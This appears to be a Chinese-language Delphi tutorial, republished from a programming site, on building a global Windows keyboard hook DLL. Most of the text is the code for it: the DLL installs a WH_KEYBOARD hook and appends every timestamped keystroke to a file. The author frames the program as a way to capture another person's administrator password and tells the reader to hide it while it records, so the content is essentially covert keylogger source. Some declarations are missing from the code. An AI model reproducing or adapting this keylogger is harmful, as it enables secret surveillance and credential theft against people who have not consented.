每個程式都有自己的生存空間,在Windows系統中你可以在任何時候讓你的程式執行一些操作,還可以觸發訊息,觸發的訊息分為三種,一是操作你程式的介面,onClick,onMouseMove等等,另外一個可以使用Windows的訊息機制來捕獲一些系統訊息,但是如果你想在任何時候監控任何程式的情況那可能你就會選擇HOOK來實現了,雖然還有其他方法,但不得不承認,HOOK是一個比較簡單解決問題的途徑。
下面就來舉個例子(使用Delphi7.0調試通過):
如果你需要訪問某個人的機器,那在運行\\SB之後那個人就會在你機器上敲入他的adminsitrator密碼,當然,你也可以使用駭客工具來得到他的密碼,但是,為什麼不自己嘗試一下寫個程式記錄所有的鍵盤操作呢?
首先需要申明一點,Hook不同於一般的應用程式,需要作為一個全域DLL出現,否則無法在你程式不啟用的狀態捕獲其他資訊的,(當然你可以用Windows訊息,這個問題不在這裡討論)。
寫個DLL定義一下函數
function setkeyhook:bool;export;
function endkeyhook:bool;export;
procedure keyhookexit;far;
procedure SetMainHandle(Handle: HWND); export;forward;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
procedure EntryPointProc(Reason: Integer);
const
hMapObject: THandle = 0;
begin
case reason of
DLL_PROCESS_ATTACH:
begin
hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);
rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
end;
DLL_PROCESS_DETACH:
begin
try
UnMapViewOfFile(rHookRec);
CloseHandle(hMapObject);
except
end;
end;
end;
end;
procedure keyhookexit;far;
begin
if hNexthookproc<>0 then endkeyhook;
exitproc:=procsaveexit;
end;
function endkeyhook:bool;export;
begin
if hNexthookproc<>0 then
begin
unhookwindowshookex(hNexthookproc);
hNexthookproc:=0;
messagebeep(0);
end;
result:=hNexthookproc=0;
MainHandle:=0;
end;
function Setkeyhook:bool;export;
begin
hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);
result:=hNexthookproc<>0;
end;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
var
s:Tstringlist;
begin
if icode<0 then
begin
result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);
exit;
end;
if lparam<0 then
begin
exit;
end;
s:=TStringlist.Create;
if FileExists(afilename) then
s.LoadFromFile(afilename);
//將敲打的鍵盤字元儲存到檔案中---www.bianceng.cn
s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) + char(wParam) );
s.SaveToFile(afilename);
s.Free;
result:=0;
end;
Dll的Project檔案中定義如下
exports
setkeyhook index 1,
endkeyhook index 2,
SetMainHandle index 3;
begin
hNexthookproc:=0;
procsaveexit:=exitproc;
DllProc := @EntryPointProc;
EntryPointProc(DLL_PROCESS_ATTACH);
end.
這樣DLL就定義好了,接下來就是畫個介面:
function setkeyhook:bool;external ’keyspy.dll’;
function endkeyhook:bool;external ’keyspy.dll’;
procedure SetMainHandle(Handle: HWND); external ’keyspy.dll’;
//開始捕獲鍵盤
SetMainHandle(handle);
setkeyhook
//中止捕獲鍵盤
endkeyhook
然後吧你程式隱蔽起來,啟動捕獲鍵盤,在中止捕獲之前,所有鍵盤操作都會被記錄到你所定義的filename這個檔案名稱中去,註:這些代碼是臨時寫的,僅是為了說明如何寫個hook程式。
另外Hook的功能不僅僅是簡單使用,這就需要靠大家靈活運用了,可以跟很多windows API來配合,通過很多技巧作出讓人意想不到的效果。
本文來自: 編程入門網 http://www.bianceng.cn/Programming/Delphi/jc/200802/7186.htm
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
